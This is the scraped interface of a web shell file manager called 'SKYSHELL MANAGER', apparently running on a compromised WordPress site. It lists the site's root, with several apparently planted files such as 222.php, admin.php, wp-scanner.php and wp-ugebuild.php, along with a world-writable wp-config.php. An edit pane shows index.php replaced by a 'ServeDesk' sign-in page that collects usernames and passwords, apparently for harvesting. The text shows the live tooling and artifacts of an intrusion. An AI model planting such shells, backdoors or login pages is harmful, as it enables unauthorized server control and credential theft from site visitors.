📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
surefundeals
/
Name
Size
Perm
Actions
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.51 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
222.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
15.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.4 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.54 KB
0666
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.gz
21.5 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-scanner.php
0.15 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
31.88 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.94 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.gz
47.66 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-ugebuild.php
0.16 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
yyj.txt
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.php
<?php session_start(); $loginError = ""; if(isset($_SESSION['login_error'])){ $loginError = $_SESSION['login_error']; unset($_SESSION['login_error']); } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>ServeDesk | Sign In</title> <link rel="icon" type="image/x-icon" href="images/fav.ico"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/5.3.3/css/bootstrap.min.css"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap-icons/1.11.3/font/bootstrap-icons.min.css"> <link rel="preconnect" href="https://fonts.googleapis.com"> <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700;800&display=swap" rel="stylesheet"> <link rel="stylesheet" href="css/style.css"> <style> body { font-family: 'Inter', sans-serif; background: #f8fafc; min-height: 100vh; display: flex; align-items: center; justify-content: center; margin: 0; padding: 20px; } .login-card-modern { background: #ffffff; border-radius: 16px; box-shadow: 0 10px 25px -5px rgba(15, 23, 42, 0.08), 0 8px 10px -6px rgba(15, 23, 42, 0.04); border: 1px solid #e2e8f0; width: 100%; max-width: 440px; padding: 40px 36px; } .form-control-modern { border-radius: 10px; border: 1px solid #cbd5e1; padding: 12px 16px; font-size: 0.95rem; transition: all 0.2s ease-in-out; } /* Updated Focus Outline to Match #073e8d Theme */ .form-control-modern:focus { border-color: #073e8d; box-shadow: 0 0 0 4px rgba(7, 62, 141, 0.15); } </style> </head> <body> <div class="login-card-modern"> <div class="text-center mb-4"> <h4 class="fw-bold text-dark mb-1">ServeDesk</h4> </div> <!-- Brand Logo & Title --> <div class="text-left mb-4"> <h4 class="fw-bold text-dark mb-1">Sign in</h4> <p class="text-muted small mb-0">Server Management Tool</p> </div> <!-- Login Error Alert --> <?php if($loginError != "") { ?> <div class="alert alert-danger alert-dismissible fade show border-0 shadow-sm rounded-3 py-2 px-3 mb-4" role="alert"> <div class="d-flex align-items-center gap-2"> <i class="bi bi-exclamation-triangle-fill fs-5"></i> <div> <strong class="d-block small">Login Failed</strong> <span class="small"><?php echo htmlspecialchars($loginError); ?></span> </div> </div> <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button> </div> <?php } ?> <!-- Sign In Form --> <form action="login-process.php" method="post" novalidate> <div class="mb-3"> <label for="username" class="form-label fw-semibold small text-secondary">Username</label> <div class="input-group"> <input type="text" id="username" name="username" class="form-control form-control-modern" placeholder="Enter your username" required autofocus> </div> </div> <div class="mb-4"> <label for="password" class="form-label fw-semibold small text-secondary">Password</label> <input type="password" id="password" name="password" class="form-control form-control-modern" placeholder="••••••••" required> </div> <button type="submit" class="btn btn-gradient w-100"> <i class="bi bi-box-arrow-in-right me-2"></i>Sign In </button> </form> <div class="text-center mt-4"> <p class="text-muted small mb-0">Developed by - Redaries</p> </div> </div> <script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/5.3.3/js/bootstrap.bundle.min.js"></script> <script src="js/app.js"></script> </body> </html>
Save